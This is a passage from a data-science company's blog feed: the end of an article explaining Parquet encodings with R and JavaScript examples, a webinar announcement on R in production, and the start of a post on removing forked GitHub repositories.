in &lt;code&gt;write_parquet()&lt;/code&gt;. The default is
&lt;a href="https://en.wikipedia.org/wiki/Snappy_%28compression%29" rel="external"&gt;&lt;code&gt;snappy&lt;/code&gt;&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Clever storage of values (the next section).&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2021-parquet-file-format-big-data-r"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="parquet-encoding"&gt;Parquet Encoding&lt;/h2&gt;
&lt;p&gt;Since parquet uses column storage, values of the same type are
stored together. This opens up a whole world of optimisation tricks that
aren’t available when we save data as rows, e.g. CSV files.&lt;/p&gt;
&lt;h3 id="run-length-encoding"&gt;Run length encoding&lt;/h3&gt;
&lt;p&gt;Suppose a column just contains a single value repeated on every row.
Instead of storing the same number over and over (as a CSV file would),
we can just record &lt;em&gt;“value X repeated N times”&lt;/em&gt;. This means that even
when N gets very large, the storage costs remain small. If we had more
than one value in a column, then we can use a simple look-up table. In
parquet, this is known as &lt;em&gt;run length&lt;/em&gt; encoding. If we have the
following column&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] 4 4 4 4 4 1 2 2 2 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This would be stored as&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;value 4, repeated 5 times&lt;/li&gt;
&lt;li&gt;value 1, repeated once&lt;/li&gt;
&lt;li&gt;value 2, repeated 4 times&lt;/li&gt;
&lt;/ul&gt;
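&lt;p&gt;The idea in the list above can be sketched in a few lines of plain JavaScript. The helpers &lt;code&gt;runLengthEncode()&lt;/code&gt; and &lt;code&gt;runLengthDecode()&lt;/code&gt; are hypothetical and only illustrate the principle. They do not reproduce Parquet’s actual on-disk encoding.&lt;/p&gt;

```javascript
// Hypothetical helper: collapse consecutive repeats into { value, count } runs
function runLengthEncode(values) {
  const runs = [];
  for (const value of values) {
    const last = runs[runs.length - 1]; // undefined while runs is empty
    if (last === undefined || last.value !== value) {
      runs.push({ value, count: 1 }); // a new run starts here
    } else {
      last.count += 1; // same value again: extend the current run
    }
  }
  return runs;
}

// Hypothetical helper: expand the runs back into the original column
function runLengthDecode(runs) {
  return runs.flatMap((run) => Array(run.count).fill(run.value));
}

const column = [4, 4, 4, 4, 4, 1, 2, 2, 2, 2];
const encoded = runLengthEncode(column);

console.log(encoded);
// [ { value: 4, count: 5 }, { value: 1, count: 1 }, { value: 2, count: 4 } ]
console.log(runLengthDecode(encoded));
// [ 4, 4, 4, 4, 4, 1, 2, 2, 2, 2 ]
```

&lt;p&gt;Ten values are stored as three runs. The saving grows with the length of each run, and a column with no consecutive repeats gains nothing.&lt;/p&gt;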
&lt;p&gt;To see this in action, let’s create a simple example, where the character
&lt;code&gt;A&lt;/code&gt; is repeated multiple times in a data frame column:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;data.frame&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;A&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1e6&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can then create a couple of temporary files for our experiment&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;parquet &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tempfile&lt;/span&gt;(fileext &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;.parquet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;csv &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tempfile&lt;/span&gt;(fileext &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;.csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and write the data to the files&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;arrow&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;write_parquet&lt;/span&gt;(x, sink &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; parquet, compression &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;uncompressed&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;readr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;write_csv&lt;/span&gt;(x, file &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; csv)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Using the {fs} package, we extract the size&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Could also use file.info()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;fs&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;file_info&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(parquet, csv))[, &lt;span style="color:#a5d6ff"&gt;&amp;#34;size&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # A tibble: 2 × 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; size&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &amp;lt;fs::bytes&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 1 808&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 2 1.91M&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We see that the parquet file is tiny, whereas the CSV file is almost
2MB. This is more than a 2,000-fold reduction in file size.&lt;/p&gt;
&lt;h3 id="dictionary-encoding"&gt;Dictionary encoding&lt;/h3&gt;
&lt;p&gt;Suppose we had the following character vector&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;Jumping Rivers&amp;#34; &amp;#34;Jumping Rivers&amp;#34; &amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If we want to save storage, then we could replace &lt;code&gt;Jumping Rivers&lt;/code&gt; with
the number &lt;code&gt;0&lt;/code&gt; and have a table to map between &lt;code&gt;0&lt;/code&gt; and &lt;code&gt;Jumping Rivers&lt;/code&gt;.
This would significantly reduce storage, especially for long vectors.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;data.frame&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1e6&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;arrow&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;write_parquet&lt;/span&gt;(x, sink &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; parquet)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;readr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;write_csv&lt;/span&gt;(x, file &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; csv)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;fs&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;file_info&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(parquet, csv))[, &lt;span style="color:#a5d6ff"&gt;&amp;#34;size&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # A tibble: 2 × 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; size&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &amp;lt;fs::bytes&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 1 909&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 2 14.3M&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="delta-encoding"&gt;Delta encoding&lt;/h3&gt;
&lt;p&gt;This encoding is typically used in conjunction with timestamps. Times
are usually stored as Unix time, which is the &lt;a href="https://www.epochconverter.com/" rel="external"&gt;number of
seconds&lt;/a&gt; that have elapsed since
January 1st, 1970 (UTC). This storage format isn’t particularly helpful for
humans, so it is pretty-printed to make it more palatable for
us. For example,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;(time &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.time&lt;/span&gt;())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;2024-02-01 13:02:03 CET&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;unclass&lt;/span&gt;(time)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] 1706788923&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If we have a large number of timestamps in a column, one method for
reducing file size is to subtract the minimum timestamp from all
values. For example, instead of storing&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1628426074&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1628426078&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1628426080&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] 1628426074 1628426078 1628426080&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;we would store&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] 0 4 6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;with the corresponding offset &lt;code&gt;1628426074&lt;/code&gt;.&lt;/p&gt;
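&lt;p&gt;As a minimal sketch in base R (an illustration of the idea only, not how parquet implements it internally; the variable names are our own), we can subtract the minimum and recover the original values by adding the offset back. Note that, as we understand the parquet specification, its delta encoding stores differences between consecutive values rather than differences from the minimum; &lt;code&gt;diff()&lt;/code&gt; mimics that variant.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;times = c(1628426074, 1628426078, 1628426080)

# Offset approach described above: store the minimum once, plus small values
offset = min(times)
encoded = times - offset
encoded
#&amp;gt; [1] 0 4 6

# Decoding simply adds the offset back
decoded = encoded + offset
identical(decoded, times)
#&amp;gt; [1] TRUE

# Variant: keep the first value and the differences between neighbours
deltas = diff(times)
deltas
#&amp;gt; [1] 4 2
identical(cumsum(c(times[1], deltas)), times)
#&amp;gt; [1] TRUE
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In both cases the stored numbers are much smaller than the raw timestamps, so they need fewer bits.&lt;/p&gt;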
&lt;h3 id="other-encodings"&gt;Other encodings&lt;/h3&gt;
&lt;p&gt;There are a few other tricks that parquet uses. Their &lt;a href="https://github.com/apache/parquet-format/blob/master/Encodings.md" rel="external"&gt;GitHub
page&lt;/a&gt;
gives a complete overview.&lt;/p&gt;
&lt;p&gt;If you have a parquet file, you can use
&lt;a href="https://github.com/apache/parquet-mr" rel="external"&gt;parquet-mr&lt;/a&gt; to investigate the
encoding used within a file. However, installing the tool isn’t trivial
and does take some time.&lt;/p&gt;
&lt;h2 id="feather-vs-parquet"&gt;Feather vs Parquet&lt;/h2&gt;
&lt;p&gt;The obvious question that comes to mind when discussing parquet is how
it compares to the feather format. Feather is optimised for speed,
whereas parquet is optimised for storage. It’s also worth noting that
the &lt;a href="https://arrow.apache.org/faq/#what-about-the-feather-file-format" rel="external"&gt;Apache
Arrow&lt;/a&gt;
file format &lt;em&gt;is&lt;/em&gt; feather.&lt;/p&gt;
&lt;h2 id="parquet-vs-rds-formats"&gt;Parquet vs RDS Formats&lt;/h2&gt;
&lt;p&gt;The RDS file format is used by &lt;code&gt;readRDS()/saveRDS()&lt;/code&gt;; the closely related RData format is used by &lt;code&gt;load()/save()&lt;/code&gt;.
RDS is a file format native to R and can only be read by R. The main
benefit of using RDS is that it can store any R object, including environments,
lists, and functions.&lt;/p&gt;
&lt;p&gt;If we are solely interested in rectangular data structures, e.g. data
frames, then reasons for using RDS files are&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the file format has been around for a long time and isn’t likely to
change. This means it is backwards compatible&lt;/li&gt;
&lt;li&gt;it doesn’t depend on any external packages; just base R.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The advantages of using parquet are&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;parquet files are slightly smaller. In my experiments the difference was small, but for some
use cases an additional saving of 5% may be worth it. As always, it depends on your
particular use case. If you want to compare file sizes, make sure you set
&lt;code&gt;compression = &amp;quot;gzip&amp;quot;&lt;/code&gt; in
&lt;code&gt;write_parquet()&lt;/code&gt; for a fair comparison.&lt;/li&gt;
&lt;li&gt;parquet files are cross platform&lt;/li&gt;
&lt;/ul&gt;
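&lt;p&gt;If you want to check the size difference on your own data, a rough sketch is given below. It assumes the {arrow} package is installed with gzip support, and the data frame &lt;code&gt;df&lt;/code&gt; is a made-up example rather than the data used in my experiments, so the sizes you see will differ.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical example data; replace with your own data frame
df = data.frame(
  id = 1:1e5,
  group = rep(c(&amp;#34;a&amp;#34;, &amp;#34;b&amp;#34;), 5e4),
  value = rnorm(1e5)
)

rds = tempfile(fileext = &amp;#34;.rds&amp;#34;)
parquet = tempfile(fileext = &amp;#34;.parquet&amp;#34;)

# saveRDS() uses gzip compression by default
saveRDS(df, file = rds)
# Use gzip for parquet too, so the comparison is like for like
arrow::write_parquet(df, sink = parquet, compression = &amp;#34;gzip&amp;#34;)

# File sizes in bytes: RDS first, then parquet
file.size(c(rds, parquet))
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;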
&lt;h2 id="references"&gt;References&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;The &lt;a href="https://en.wikipedia.org/wiki/Snappy_%28compression%29" rel="external"&gt;default
compression&lt;/a&gt;
algorithm used by Parquet.&lt;/li&gt;
&lt;li&gt;A nice &lt;a href="https://www.youtube.com/watch?v=RwGGqwe-SAY" rel="external"&gt;talk&lt;/a&gt; by
Raoul-Gabriel Urma.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/ktrueda/parquet-tools" rel="external"&gt;Parquet-tools&lt;/a&gt; for
interrogating Parquet files.&lt;/li&gt;
&lt;li&gt;The official list of &lt;a href="https://github.com/apache/parquet-format/blob/master/Encodings.md" rel="external"&gt;file
optimisations&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Stackoverflow questions on Parquet: &lt;a href="https://stackoverflow.com/questions/48083405/what-are-the-differences-between-feather-and-parquet" rel="external"&gt;Feather &amp;amp;
Parquet&lt;/a&gt;
and &lt;a href="https://stackoverflow.com/questions/56472727/difference-between-apache-parquet-and-arrow" rel="external"&gt;Arrow and
Parquet&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/parquet-file-format-big-data-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Webinars: Practical Advice for R in Production</title><link>https://www.jumpingrivers.com/blog/webinars-practical-advice-for-r-in-production/</link><pubDate>Mon, 19 Jul 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/webinars-practical-advice-for-r-in-production/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/webinars-practical-advice-for-r-in-production/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/rstudio-r-in-production-security-connect/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Many organisations have a robust infrastructure
that allows their data science teams to provide fast and reliable insights.
But many groups are just starting down this path.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2021-rstudio-r-in-production-security-connect"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;We, &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;, have partnered with &lt;a href="https://rstudio.com/" rel="external"&gt;RStudio&lt;/a&gt; to launch a two-part webinar series which examines and explores the usage of R in production environments.
The first webinar will discuss the big picture of using open source languages and tools in enterprise environments.
We&amp;rsquo;ll investigate typical set-ups which many companies employ when implementing R in production.
Borrowing from the idea of &lt;a href="https://www.youtube.com/watch?v=7oyiPBjLAWY" rel="external"&gt;Code Smell&lt;/a&gt;,
we&amp;rsquo;ll think about &amp;ldquo;R in Production&amp;rdquo;. That is, set-ups that seem OK at first glance,
but on closer inspection are lacking. We&amp;rsquo;ll end the first webinar by discussing
successful set-ups that companies have adopted.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Sign up for &lt;a href="https://www.rstudio.com/registration/practical-advice-for-r-in-production/" rel="external"&gt;part 1&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The second webinar will be a hands-on workshop to gain the skills needed for securely putting R in production.
If you are interested in seeing how RStudio tools can make your data science life easier,
then this is the workshop for you.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Sign up for &lt;a href="https://www.rstudio.com/registration/practical-advice-for-r-in-production-2/" rel="external"&gt;part 2&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/webinars-practical-advice-for-r-in-production/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Cleaning up forked GitHub repositories with {gh}</title><link>https://www.jumpingrivers.com/blog/github-clean-remove-forks/</link><pubDate>Tue, 13 Jul 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/github-clean-remove-forks/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/github-clean-remove-forks/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/github-clean-remove-forks/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;One great thing about using &lt;a href="https://github.com/" rel="external"&gt;GitHub&lt;/a&gt; is the ability
to view and contribute to others’ code. Even the code underlying many of
our favourite packages is available for us to examine and play around
with.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://guides.github.com/activities/forking/" rel="external"&gt;Forking a repository&lt;/a&gt; is
a great way to create an exact replica of someone else’s project in our
own user space. We can then freely make changes to this copy without
affecting the original project. If you end up especially proud of your
changes, you can then submit a Pull Request to offer them up to the
owner of the original repository. However, your fork doesn’t have to end
up in a contribution - you can also just keep experimenting with the
code forever or use it as a starting point for your own project.&lt;/p&gt;
&lt;h3 id="a-forking-mess"&gt;A forking mess&lt;/h3&gt;
&lt;p&gt;If you are an avid forker of GitHub repos, your original repositories on
GitHub may quickly become crammed in between an endless stream of forked
repos. Your user space becomes very cluttered, with old forks that
you haven’t looked at in years still taking up space. Well, now it’s
time for some spring cleaning and the first task is de-cluttering your
repositories by removing forks.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2021-github-clean-remove-forks"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="manually-cleaning"&gt;Manually cleaning&lt;/h3&gt;
&lt;p&gt;You can manually delete repositories using the GitHub interface. Go to
the repository you wish to delete, then select &lt;em&gt;Settings&lt;/em&gt; at the top of
the page&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/github-clean-remove-forks/github-settings.png" title="The Settings button on your repository" alt="The Settings button on your repository" style="display: block; margin: auto;" /&gt;
&lt;p&gt;Then scroll to the bottom of the page and enter the &lt;em&gt;Danger Zone&lt;/em&gt; marked
by a red box.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/github-clean-remove-forks/github-danger-zone.png" title="Deleting a repo from the Danger Zone" alt="Deleting a repo from the Danger Zone" style="display: block; margin: auto;" /&gt;
&lt;p&gt;From there, you can select &lt;em&gt;Delete this repository&lt;/em&gt; which will prompt
you to confirm that you are absolutely sure of what you’re doing by
typing out the name of the repository. Note that after deleting the
repository, the action &lt;em&gt;cannot&lt;/em&gt; be undone. Also note that if you are
deleting a forked repository, deleting it will only remove it (including
any changes you have made to it) from your own GitHub - you won’t
accidentally delete the original project (phew).&lt;/p&gt;
&lt;p&gt;So it is possible to clean up your GitHub manually and this might be the
most suitable way if you’re only wanting to delete 1-2 repositories. But
let’s say you’ve forked over fifty repositories. Manually going into
each one, finding the delete button in the settings and typing in the
confirmation prompt is not what you want to spend your day doing. As
with all manual methods, pointing and clicking does not scale
particularly well.&lt;/p&gt;
&lt;h2 id="using-the-gh-package"&gt;Using the {gh} package&lt;/h2&gt;
